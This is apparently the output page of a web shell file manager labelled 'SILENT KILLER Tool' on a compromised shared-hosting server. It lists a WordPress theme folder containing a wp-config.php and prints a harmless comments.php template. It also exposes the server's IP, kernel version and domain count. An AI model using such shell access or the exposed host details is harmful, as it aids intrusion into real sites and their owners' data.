Current Path: > home > transcarter > public_html > wp-content > themes > config_1754038130
Operation : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64 Software : Apache Server IP : 198.54.126.42 | Your IP: 216.73.216.135 Domains : 1034 Domain(s) Permission : [ 0755 ]
Name | Type | Size | Last Modified | Actions |
---|---|---|---|---|
assets | Directory | - | - | |
images | Directory | - | - | |
inc | Directory | - | - | |
languages | Directory | - | - | |
public | Directory | - | - | |
template-parts | Directory | - | - | |
404.php | File | 840 bytes | August 01 2025 08:48:56. | |
README.md | File | 13574 bytes | August 01 2025 08:48:56. | |
README.txt | File | 8382 bytes | August 01 2025 08:48:56. | |
archive.php | File | 2327 bytes | August 01 2025 08:48:56. | |
comments.php | File | 1632 bytes | August 01 2025 08:48:56. | |
error_log | File | 1818 bytes | August 06 2025 16:31:10. | |
footer.php | File | 687 bytes | August 01 2025 08:48:56. | |
functions.php | File | 13726 bytes | August 01 2025 08:48:56. | |
header.php | File | 4092 bytes | August 01 2025 08:48:56. | |
index.php | File | 2047 bytes | August 01 2025 08:48:56. | |
page.php | File | 806 bytes | August 01 2025 08:48:56. | |
rtl.css | File | 5544 bytes | August 01 2025 08:48:56. | |
screenshot.jpg | File | 20951 bytes | August 01 2025 08:48:56. | |
search.php | File | 1749 bytes | August 01 2025 08:48:56. | |
searchform.php | File | 596 bytes | August 01 2025 08:48:56. | |
sidebar.php | File | 995 bytes | August 01 2025 08:48:56. | |
single.php | File | 872 bytes | August 01 2025 08:48:56. | |
style.css | File | 35334 bytes | August 01 2025 08:48:56. | |
style.min.css | File | 24040 bytes | August 01 2025 08:48:56. | |
wp-config.php | File | 5042 bytes | August 01 2025 08:48:56. |
<?php /** * The template for displaying comments * * This is the template that displays the area of the page that contains both the current comments * and the comment form. * * @link https://codex.wordpress.org/Template_Hierarchy * * @package WordPress * @subpackage Nasio * @since 1.0 * @version 1.0 */ /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if (post_password_required()) { return; } ?> <div class="comment-content"> <?php if (have_comments()): ?> <h3 class="mb-5"> <?php printf(__('Comments', 'nasio')); ?> </h3> <?php the_comments_navigation();?> <ul class="comment-list"> <?php wp_list_comments(array( 'style' => 'ul', 'class' => 'comment-list', 'short_ping' => true, 'avatar_size' => 70, )); ?> </ul><!-- .comment-list --> <?php the_comments_navigation();?> <?php endif; comment_form(array( 'title_reply_before' => '<h3 id="reply-title" class="comment-reply-title">', 'title_reply_after' => '</h3>', 'title_reply' => __('Leave a Comment', 'nasio'), 'class_submit' => 'btn btn-primary', 'label_submit' => __('Submit Query', 'nasio'), 'comment_field' => '<p class="comment-form-comment">' . '<label for="comment">' . __('Message', 'nasio') . '</label>' . '<textarea id="comment" name="comment" class="form-control" cols="45" rows="8" aria-required="true"></textarea>' . '</p>', )); ?> </div><!-- .comments-area -->
SILENT KILLER Tool